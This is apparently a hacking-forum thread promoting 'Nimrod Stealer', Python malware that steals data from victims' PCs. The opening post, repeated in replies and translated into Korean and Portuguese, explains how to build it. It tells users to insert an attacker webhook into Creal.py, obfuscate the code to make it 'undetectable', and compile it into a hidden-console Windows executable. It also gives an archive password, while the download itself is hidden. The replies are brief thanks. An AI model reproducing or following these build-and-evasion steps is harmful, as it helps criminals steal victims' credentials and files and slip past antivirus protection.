[ New ] 🌎Nimrod Stealer based on Python✅

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Jun 29, 2023
Nimrod stealer can be working to steal anything in your pc and these days people hacker target many on youtube and
target much security by using type stealer.
thanks to our world hackers that give people ideas and found the new way to break security
this stealer is based on Python easy fud because many products can help you fud Python easy then c# or C++ or C

View attachment 95

View attachment 96

View attachment 97
Setup (dont change this sentence)
first open install.py

open builder.bat
or you want manually work nevermind try this :

First paste and save your webhook address instead of "WEBHOOK HERE" in Creal.py

If you use obfuscator it will be undetectable.

if you have an error while installing try pip install -r requirements.txt

Now You need to use pyinstaller to convert python file to exe.

Open CMD and type pip install auto_py_to_exe

And after installed python -m auto_py_to_exe

Browse file Select One file and Windows Based (hide the console)

And press covert .py .exe

Password : drcrypter.ru

*** Hidden text: cannot be quoted. ***
Nimrod stealer can be working to steal anything in your pc and these days people hacker target many on youtube and
target much security by using type stealer.
thanks to our world hackers that give people ideas and found the new way to break security
this stealer is based on Python easy fud because many products can help you fud Python easy then c# or C++ or C

View attachment 95

View attachment 96

View attachment 97
Setup (dont change this sentence)
first open install.py

open builder.bat
or you want manually work nevermind try this :

First paste and save your webhook address instead of "WEBHOOK HERE" in Creal.py

If you use obfuscator it will be undetectable.

if you have an error while installing try pip install -r requirements.txt

Now You need to use pyinstaller to convert python file to exe.

Open CMD and type pip install auto_py_to_exe

And after installed python -m auto_py_to_exe

Browse file Select One file and Windows Based (hide the console)

And press covert .py .exe

Password : drcrypter.ru

*** Hidden text: cannot be quoted. ***
thanks man
Nimrod stealer can be working to steal anything in your pc and these days people hacker target many on youtube and
target much security by using type stealer.
thanks to our world hackers that give people ideas and found the new way to break security
this stealer is based on Python easy fud because many products can help you fud Python easy then c# or C++ or C

View attachment 95

View attachment 96

View attachment 97
Setup (dont change this sentence)
first open install.py

open builder.bat
or you want manually work nevermind try this :

First paste and save your webhook address instead of "WEBHOOK HERE" in Creal.py

If you use obfuscator it will be undetectable.

if you have an error while installing try pip install -r requirements.txt

Now You need to use pyinstaller to convert python file to exe.

Open CMD and type pip install auto_py_to_exe

And after installed python -m auto_py_to_exe

Browse file Select One file and Windows Based (hide the console)

And press covert .py .exe

Password : drcrypter.ru

*** Hidden text: cannot be quoted. ***
sounds good
Nimrod stealer can be working to steal anything in your pc and these days people hacker target many on youtube and
target much security by using type stealer.
thanks to our world hackers that give people ideas and found the new way to break security
this stealer is based on Python easy fud because many products can help you fud Python easy then c# or C++ or C

View attachment 95

View attachment 96

View attachment 97
Setup (dont change this sentence)
first open install.py

open builder.bat
or you want manually work nevermind try this :

First paste and save your webhook address instead of "WEBHOOK HERE" in Creal.py

If you use obfuscator it will be undetectable.

if you have an error while installing try pip install -r requirements.txt

Now You need to use pyinstaller to convert python file to exe.

Open CMD and type pip install auto_py_to_exe

And after installed python -m auto_py_to_exe

Browse file Select One file and Windows Based (hide the console)

And press covert .py .exe

Password : drcrypter.ru

*** Hidden text: cannot be quoted. ***
great work keep it up
Nimrod 스틸러는 PC에 있는 모든 것을 훔치기 위해 노력할 수 있으며 요즘 사람들은 해커가 YouTube에서 많은 것을 목표로 삼고 있습니다.
유형 스틸러를 사용하여 많은 보안을 목표로 합니다.
사람들에게 아이디어를 제공하고 보안을 깨는 새로운 방법을 찾은 세계 해커들에게 감사합니다.
이 스틸러는 Python easy fud를 기반으로 합니다. 왜냐하면 많은 제품이 C#, C++ 또는 C보다 Python easy를 푸는 데 도움이 될 수 있기 때문입니다.

View attachment 95

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View attachment 97
설정(이 문장을 변경하지 마십시오)
먼저 install.py를 엽니다.

builder.bat 열기
또는 수동 작업을 원할 경우 신경쓰지 말고 다음을 시도하십시오.

먼저 Creal.py에 "WEBHOOK HERE" 대신 웹후크 주소를 붙여넣고 저장합니다.

obfuscator를 사용하면 감지할 수 없습니다.

설치하는 동안 오류가 발생하면 pip install -r requirements.txt를 시도하십시오.

이제 pyinstaller를 사용하여 파이썬 파일을 exe로 변환해야 합니다.

CMD를 열고 pip install auto_py_to_exe를 입력합니다.

그리고 python -m auto_py_to_exe를 설치한 후

파일 찾아보기 하나의 파일 및 Windows 기반 선택(콘솔 숨기기)

그리고 은밀한 .py .exe를 누르십시오.


비밀번호 : drcrypter.ru

*** 숨겨진 텍스트: 인용할 수 없습니다. ***

O ladrão Nimrod pode estar trabalhando para roubar qualquer coisa no seu PC e hoje em dia os hackers têm como alvo muitos no YouTube e
almeje muita segurança usando o ladrão de tipos.
graças aos hackers do nosso mundo que deram ideias às pessoas e encontraram uma nova maneira de quebrar a segurança
este ladrão é baseado em Python easy fud porque muitos produtos podem ajudá-lo a fud Python easy então c# ou C++ ou C

View attachment 95

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Configuração (não altere esta frase)
primeiro abra install.py

abra construtor.bat
ou você deseja trabalhar manualmente, esqueça, tente isto:

Primeiro cole e salve seu endereço de webhook em vez de "WEBHOOK AQUI" em Creal.py

Se você usar o ofuscador, ele será indetectável.

se você tiver um erro durante a instalação, tente pip install -r requisitos.txt

Agora você precisa usar o pyinstaller para converter o arquivo python em exe.

Abra o CMD e digite pip install auto_py_to_exe

E depois de instalado python -m auto_py_to_exe

Procurar arquivo Selecione um arquivo e baseado em Windows (ocultar o console)

E pressione secreto .py .exe

Senha: drcrypter.ru

*** Texto oculto: não pode ser citado. ***
Nimrod stealer can be working to steal anything in your pc and these days people hacker target many on youtube and
target much security by using type stealer.
thanks to our world hackers that give people ideas and found the new way to break security
this stealer is based on Python easy fud because many products can help you fud Python easy then c# or C++ or C

View attachment 95

View attachment 96

View attachment 97
Setup (dont change this sentence)
first open install.py

open builder.bat
or you want manually work nevermind try this :

First paste and save your webhook address instead of "WEBHOOK HERE" in Creal.py

If you use obfuscator it will be undetectable.

if you have an error while installing try pip install -r requirements.txt

Now You need to use pyinstaller to convert python file to exe.

Open CMD and type pip install auto_py_to_exe

And after installed python -m auto_py_to_exe

Browse file Select One file and Windows Based (hide the console)

And press covert .py .exe

Password : drcrypter.ru

*** Hidden text: cannot be quoted. ***
thanks bro
Nimrod stealer can be working to steal anything in your pc and these days people hacker target many on youtube and
target much security by using type stealer.
thanks to our world hackers that give people ideas and found the new way to break security
this stealer is based on Python easy fud because many products can help you fud Python easy then c# or C++ or C

View attachment 95

View attachment 96

View attachment 97
Setup (dont change this sentence)
first open install.py

open builder.bat
or you want manually work nevermind try this :

First paste and save your webhook address instead of "WEBHOOK HERE" in Creal.py

If you use obfuscator it will be undetectable.

if you have an error while installing try pip install -r requirements.txt

Now You need to use pyinstaller to convert python file to exe.

Open CMD and type pip install auto_py_to_exe

And after installed python -m auto_py_to_exe

Browse file Select One file and Windows Based (hide the console)

And press covert .py .exe

Password : drcrypter.ru

*** Hidden text: cannot be quoted. ***
Nimrod stealer can be working to steal anything in your pc and these days people hacker target many on youtube and
target much security by using type stealer.
thanks to our world hackers that give people ideas and found the new way to break security
this stealer is based on Python easy fud because many products can help you fud Python easy then c# or C++ or C

View attachment 95

View attachment 96

View attachment 97
Setup (dont change this sentence)
first open install.py

open builder.bat
or you want manually work nevermind try this :

First paste and save your webhook address instead of "WEBHOOK HERE" in Creal.py

If you use obfuscator it will be undetectable.

if you have an error while installing try pip install -r requirements.txt

Now You need to use pyinstaller to convert python file to exe.

Open CMD and type pip install auto_py_to_exe

And after installed python -m auto_py_to_exe

Browse file Select One file and Windows Based (hide the console)

And press covert .py .exe

Password : drcrypter.ru

*** Hidden text: cannot be quoted. ***

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